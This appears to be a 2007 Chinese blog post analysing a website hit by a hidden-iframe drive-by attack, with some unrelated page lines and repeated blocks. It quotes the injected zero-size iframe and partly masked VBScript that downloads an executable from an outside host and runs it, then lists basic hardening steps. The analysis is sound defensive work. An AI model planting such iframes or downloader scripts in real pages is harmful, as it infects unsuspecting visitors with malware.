好漂亮的书,不忍心翻啊
吴邦国:充分利用网络技术拓宽知情知政渠道
刚快吃饭的时候群里的朋友说他的网站被挂马了,杀软进去就报毒,估计该"黑客"没有对程序进行免杀处理.该网站采用动易系统,很明显网站被入侵了.由于杀软已经报毒所以没有什么危害,闲来无事,分析一下好了
查看源文件得知被插入如下代码
即在正常网页插入内嵌页面,长宽都为0,这样网页打开者就不会有所察觉,前一阵的熊猫也是利用这个手法.使用VIEW命令查看h**p://www.txdpf.org.cn/index.htm源代码,发现是利用VBScript脚本命令模拟程序下载h**p://www.txdpf.org.cn/index.exe(Trojan-Downloader.VBS.Small),也就是常说的VBS,然后自动运行.执行完毕以后该页面显示你好,您所访问的页面正在加载中...请稍候片刻....其实在显示这段文字之前病毒已经下载到本机执行完毕了.部分代码如下
functi** init() { document.wri**("你好,您所访问的页面正在加载中...请稍候片刻....")
建议防范处理方法:
1.打上最新补丁
2.更改后台登陆地址
3.更改一个强壮的管理员密码,如:E5gt%4e8R
4.更改数据库名称
©文章版权所有,转载注明来自VipHjw[ViYaZone.Cn]
查看源文件得知被插入如下代码
引用
<*ifra*** src=h**p://www.txdpf.org.cn/index.htm width=0 height=0>
引用
Rar!var Laoding="%3Chtm*%3E%3Cscri** language%3D%22VBScri**%22%3E
on error resume next%0D%0A";document.wri**(unescape(Laoding))
y = "h**p://www.txdpf.org.cn/index.exe"
m4="down"
m5="file"
m6="copy"
m7="exit"
Set yc = document.crea**Element("object")
on error resume next%0D%0A";document.wri**(unescape(Laoding))
y = "h**p://www.txdpf.org.cn/index.exe"
m4="down"
m5="file"
m6="copy"
m7="exit"
Set yc = document.crea**Element("object")
引用
set ye = yc.createobje**("Shell.Applicati**","")
ye.ShellExecute y9,BBS,BBS,"open",0
ye.ShellExecute y9,BBS,BBS,"open",0
引用
建议防范处理方法:
1.打上最新补丁
2.更改后台登陆地址
3.更改一个强壮的管理员密码,如:E5gt%4e8R
4.更改数据库名称
©文章版权所有,转载注明来自VipHjw[ViYaZone.Cn]
2007-3-12 12:29 | 
分类: 
怎么像JS……